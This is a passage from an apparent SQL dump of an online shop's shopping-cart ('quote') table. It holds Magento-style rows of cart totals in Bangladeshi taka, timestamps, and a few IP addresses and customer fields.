(1132, 1, '2026-04-22 17:47:18', '2026-04-22 17:47:21', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1133, 1, '2026-04-23 01:05:56', '2026-04-23 01:05:59', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1134, 1, '2026-04-23 02:40:22', '2026-04-23 02:40:22', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1135, 1, '2026-04-23 08:12:05', '2026-04-23 08:12:07', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1136, 1, '2026-04-23 12:02:27', '2026-04-23 12:02:27', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1137, 1, '2026-04-23 16:41:36', '2026-04-23 16:41:39', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1138, 1, '2026-04-23 17:38:46', '2026-04-23 17:38:46', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1139, 1, '2026-04-23 21:31:11', '2026-04-23 21:31:11', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1140, 1, '2026-04-24 01:00:31', '2026-04-24 01:00:55', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1141, 1, '2026-04-24 06:44:30', '2026-04-24 06:44:30', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1142, 1, '2026-04-24 09:15:50', '2026-04-24 09:15:52', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1143, 1, '2026-04-24 16:15:29', '2026-04-24 16:15:29', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1144, 1, '2026-04-24 18:33:36', '2026-04-24 18:33:39', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1145, 1, '2026-04-24 23:08:22', '2026-04-24 23:08:22', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1146, 1, '2026-04-24 23:08:27', '2026-04-24 23:08:27', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '104.28.226.107', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(1147, 1, '2026-04-25 01:24:49', '2026-04-25 01:24:49', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1148, 1, '2026-04-25 04:06:52', '2026-04-25 04:06:59', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1149, 1, '2026-04-25 10:33:35', '2026-04-25 10:33:35', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1150, 1, '2026-04-25 12:28:12', '2026-04-25 12:28:38', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1151, 1, '2026-04-25 19:51:24', '2026-04-25 19:51:24', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1152, 1, '2026-04-25 20:58:35', '2026-04-25 20:58:37', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1153, 1, '2026-04-26 05:08:19', '2026-04-26 05:08:19', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1154, 1, '2026-04-26 05:18:20', '2026-04-26 05:18:22', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1155, 1, '2026-04-26 13:36:07', '2026-04-26 13:36:29', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1156, 1, '2026-04-26 14:20:56', '2026-04-26 14:20:56', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1157, 1, '2026-04-26 14:27:35', '2026-04-26 14:27:41', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 337.6000, 337.6000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 422.0000, 422.0000, 337.6000, 337.6000, 1, 0, NULL, NULL, 0),
(1158, 1, '2026-04-26 14:50:04', '2026-04-26 14:50:09', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 337.6000, 337.6000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 422.0000, 422.0000, 337.6000, 337.6000, 1, 0, NULL, NULL, 0),
(1159, 1, '2026-04-26 22:00:16', '2026-04-26 22:00:18', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1160, 1, '2026-04-26 23:40:27', '2026-04-26 23:40:27', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1161, 1, '2026-04-27 03:21:02', '2026-04-27 03:21:04', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1162, 1, '2026-04-27 03:21:05', '2026-04-27 03:21:05', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1163, 1, '2026-04-27 03:21:27', '2026-04-27 03:21:27', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1164, 1, '2026-04-27 03:21:40', '2026-04-27 03:21:40', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1165, 1, '2026-04-27 03:22:00', '2026-04-27 03:22:03', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(1166, 1, '2026-04-27 03:22:02', '2026-04-27 03:22:02', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1167, 1, '2026-04-27 03:22:24', '2026-04-27 03:22:25', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 337.6000, 337.6000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 422.0000, 422.0000, 337.6000, 337.6000, 1, 0, NULL, NULL, 0),
(1168, 1, '2026-04-27 06:20:47', '2026-04-27 06:20:50', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1169, 1, '2026-04-27 08:52:34', '2026-04-27 08:52:34', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1170, 1, '2026-04-27 14:15:58', '2026-04-27 14:16:01', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1171, 1, '2026-04-27 16:17:05', '2026-04-27 16:17:05', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1172, 1, '2026-04-27 18:42:04', '2026-04-27 18:42:11', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 337.6000, 337.6000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 422.0000, 422.0000, 337.6000, 337.6000, 1, 0, NULL, NULL, 0),
(1173, 1, '2026-04-27 20:07:44', '2026-04-27 20:07:44', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1174, 1, '2026-04-27 20:13:37', '2026-04-27 20:13:37', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1175, 1, '2026-04-27 20:21:46', '2026-04-27 20:21:46', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1176, 1, '2026-04-27 20:44:22', '2026-04-27 20:44:22', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1177, 1, '2026-04-27 21:44:37', '2026-04-27 21:44:44', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1178, 1, '2026-04-27 22:25:41', '2026-04-27 22:25:47', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 337.6000, 337.6000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 422.0000, 422.0000, 337.6000, 337.6000, 1, 0, NULL, NULL, 0),
(1179, 1, '2026-04-27 23:52:28', '2026-04-27 23:52:28', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1180, 1, '2026-04-28 00:13:24', '2026-04-28 00:13:24', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 136, NULL, 1, 'c.ahu.wu.zog.a.w0.4@gmail.com', NULL, 'CNmvgaxbAQXuSDGMHXdKjfAZ', NULL, 'gUskOIzxSXRbvQGSTcCXvtY', NULL, NULL, NULL, 1, 0, '185.220.101.133', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1181, 1, '2026-04-28 00:44:24', '2026-04-28 00:44:31', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 337.6000, 337.6000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 422.0000, 422.0000, 337.6000, 337.6000, 1, 0, NULL, NULL, 0),
(1182, 1, '2026-04-28 05:06:07', '2026-04-28 05:06:08', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1183, 1, '2026-04-28 05:43:08', '2026-04-28 05:43:08', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1184, 1, '2026-04-28 06:56:36', '2026-04-28 06:56:36', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1185, 1, '2026-04-28 07:22:41', '2026-04-28 07:22:41', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1186, 1, '2026-04-28 08:34:33', '2026-04-28 08:34:45', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 337.6000, 337.6000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 422.0000, 422.0000, 337.6000, 337.6000, 1, 0, NULL, NULL, 0),
(1187, 1, '2026-04-28 10:36:44', '2026-04-28 10:36:44', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1188, 1, '2026-04-28 12:47:22', '2026-04-28 12:47:27', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1189, 1, '2026-04-28 15:09:24', '2026-04-28 15:09:24', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0);
INSERT INTO `quote` (`entity_id`, `store_id`, `created_at`, `updated_at`, `converted_at`, `is_active`, `is_virtual`, `is_multi_shipping`, `items_count`, `items_qty`, `orig_order_id`, `store_to_base_rate`, `store_to_quote_rate`, `base_currency_code`, `store_currency_code`, `quote_currency_code`, `grand_total`, `base_grand_total`, `checkout_method`, `customer_id`, `customer_tax_class_id`, `customer_group_id`, `customer_email`, `customer_prefix`, `customer_firstname`, `customer_middlename`, `customer_lastname`, `customer_suffix`, `customer_dob`, `customer_note`, `customer_note_notify`, `customer_is_guest`, `remote_ip`, `applied_rule_ids`, `reserved_order_id`, `password_hash`, `coupon_code`, `global_currency_code`, `base_to_global_rate`, `base_to_quote_rate`, `customer_taxvat`, `customer_gender`, `subtotal`, `base_subtotal`, `subtotal_with_discount`, `base_subtotal_with_discount`, `is_changed`, `trigger_recollect`, `ext_shipping_info`, `gift_message_id`, `is_persistent`) VALUES
(1190, 1, '2026-04-28 16:56:44', '2026-04-28 16:56:44', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
